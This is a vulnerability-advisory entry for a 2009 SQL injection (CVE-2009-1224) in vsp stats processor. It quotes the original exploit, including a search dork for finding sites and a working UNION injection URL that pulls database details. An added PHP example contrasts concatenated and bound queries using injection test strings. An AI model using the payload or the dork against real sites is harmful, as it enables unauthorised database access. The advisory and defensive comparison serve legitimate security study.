scivox vsp_stats_processor 'gamestat.php' SQL Injection Vulnerability

Vulnerability ID: 1117538
Vulnerability type: SQL injection
Published: 2009-03-31
Updated: 2009-03-31
CVE ID: CVE-2009-1224
CNNVD-ID: CNNVD-200904-036
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/8331
https://www.securityfocus.com/bid/34320
https://cxsecurity.com/issue/WLB-2009040102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-036
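|Vulnerability details
In vsp stats processor version 0.45, vsp-core/pub/themes/bismarck/gamestat.php contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the gameID parameter.
|Exploit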
########################################
#                                         #
# Product : vsp stats processor           #
# Version : all                           #
# Dork : "powered by vsp stats processor" #
# Site: http://www.scivox.net/vsp/        #
# Found by: Dimi4                         #
# Date : 31.03.09                         #
# Greetz: antichat                        #
#                                         #
########################################

SQL-injection
[+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php
[+] Output: <option> {DATA} </option>

Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines)

 function getStatsGame()
{
  global $db;
  global $ggame;
  $sql = "select name, value
            from {$GLOBALS['cfg']['db']['table_prefix']}gamedata
            where gameID=$GLOBALS[gameID]
         ";

  //echo $sql;
  $rs = $db->Execute($sql);

.....
}


(c) Dimi4, 2009 greetz to antichat

# milw0rm.com [2009-03-31]
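
The function quoted above places the gameID request value directly into the query text. The following is an added example (not code from the advisory or from the vsp project) that shows that pattern beside a hardened form using integer validation and a bound parameter. It assumes gameID is a non-negative integer key, and uses PDO with an in-memory SQLite table and a `demo_` table prefix as constructed stand-ins for the application's database layer.

```php
<?php
// Added example, not the project's code. Assumptions: gameID is a non-negative
// integer key; PDO with in-memory SQLite stands in for the application's $db.

function getStatsGameVulnerable(PDO $db, string $prefix, string $rawGameId): array
{
    // Same pattern as the page's function: the request value becomes SQL text.
    $sql = "select name, value from {$prefix}gamedata where gameID=$rawGameId";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function getStatsGameSafe(PDO $db, string $prefix, string $rawGameId): array
{
    // 1. Validate the type: anything that is not a plain integer is refused.
    $gameId = filter_var($rawGameId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($gameId === false) {
        throw new InvalidArgumentException('gameID must be a non-negative integer');
    }
    // 2. Identifiers cannot be bound, so allow-list the configured table prefix.
    if (!preg_match('/^[A-Za-z0-9_]*\z/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // 3. Bind the value so it is never parsed as SQL.
    $stmt = $db->prepare("select name, value from {$prefix}gamedata where gameID = :gameID");
    $stmt->bindValue(':gameID', $gameId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data (table name prefix and contents are invented for the demo).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table demo_gamedata (gameID integer, name text, value text)');
$db->exec("insert into demo_gamedata values (1, 'map', 'q3dm17'), (2, 'map', 'q3dm6')");

// Constructed inputs: one legitimate id and two values that change the query shape.
foreach (['1', '-1 union select 1,2', '1 or 1=1'] as $input) {
    $leaky = count(getStatsGameVulnerable($db, 'demo_', $input));
    try {
        $safe = count(getStatsGameSafe($db, 'demo_', $input)) . ' row(s)';
    } catch (InvalidArgumentException $e) {
        $safe = 'rejected';
    }
    printf("%-20s concatenated: %d row(s)   bound: %s\n", $input, $leaky, $safe);
}
```
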
|Affected products
vsp stats processor vsp stats processor 0.45
|References

Source: MILW0RM
Name: 8331
Link: http://www.milw0rm.com/exploits/8331